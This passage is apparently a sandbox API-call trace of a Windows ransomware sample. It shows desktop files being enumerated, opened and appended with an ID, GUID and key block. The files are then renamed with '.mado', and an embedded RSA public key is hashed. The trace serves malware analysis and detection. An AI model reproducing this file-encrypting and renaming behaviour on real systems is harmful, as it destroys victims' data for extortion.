lpMem=0x3b78098 | out: hHeap=0x2c0000) returned 1 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe580 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe568 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0204.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe580 | out: hHeap=0x2c0000) returned 1 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe568 | out: hHeap=0x2c0000) returned 1 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5b0 | out: hHeap=0x2c0000) returned 1 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.932] GetCurrentThreadId () returned 0x600 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b72a70 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.932] GetCurrentThreadId () returned 0x600 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0204.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0204.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe568 [0204.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe580 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe550 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe598 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe568 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe568 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5b0 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0204.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe568 | out: hHeap=0x2c0000) returned 1 [0204.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b78098 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd90 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bfa0 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b78098 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe598 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe580 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe550 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc88 | out: hHeap=0x2c0000) returned 1 [0204.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe538 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80fa8 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6be98 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.936] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74e80*, nNumberOfBytesToWrite=0x3208, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b74e80*, lpNumberOfBytesWritten=0x39cfb14*=0x3208, lpOverlapped=0x0) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.936] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x320d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.936] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0204.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.937] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0204.937] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.937] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.937] CloseHandle (hObject=0x63c) returned 1 [0204.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0204.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74e80 [0204.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0204.938] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\E-78Ddwse5QS5w5.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\e-78ddwse5qs5w5.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\E-78Ddwse5QS5w5.ods.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\e-78ddwse5qs5w5.ods.mado")) returned 1 [0204.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.938] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.939] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92cdbd20, ftCreationTime.dwHighDateTime=0x1d5db6e, ftLastAccessTime.dwLowDateTime=0x1c8afa20, ftLastAccessTime.dwHighDateTime=0x1d5e78e, ftLastWriteTime.dwLowDateTime=0x1c8afa20, ftLastWriteTime.dwHighDateTime=0x1d5e78e, nFileSizeHigh=0x0, nFileSizeLow=0x34b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G_wsbMj2tnXma8d.wav", cAlternateFileName="G_WSBM~1.WAV")) returned 1 [0204.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0204.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.940] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\G_wsbMj2tnXma8d.wav") returned=".wav" [0204.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\G_wsbMj2tnXma8d.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\g_wsbmj2tnxma8d.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.940] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=13496) returned 1 [0204.941] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.943] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x3492, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.943] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.944] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.944] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x34b8, lpOverlapped=0x0) returned 1 [0204.945] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.945] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.945] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.945] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.946] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.946] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.946] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.946] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.946] GetLastError () returned 0x0 [0204.946] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.946] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.946] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.946] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.946] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x34c0) returned 0x3b74e80 [0204.946] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 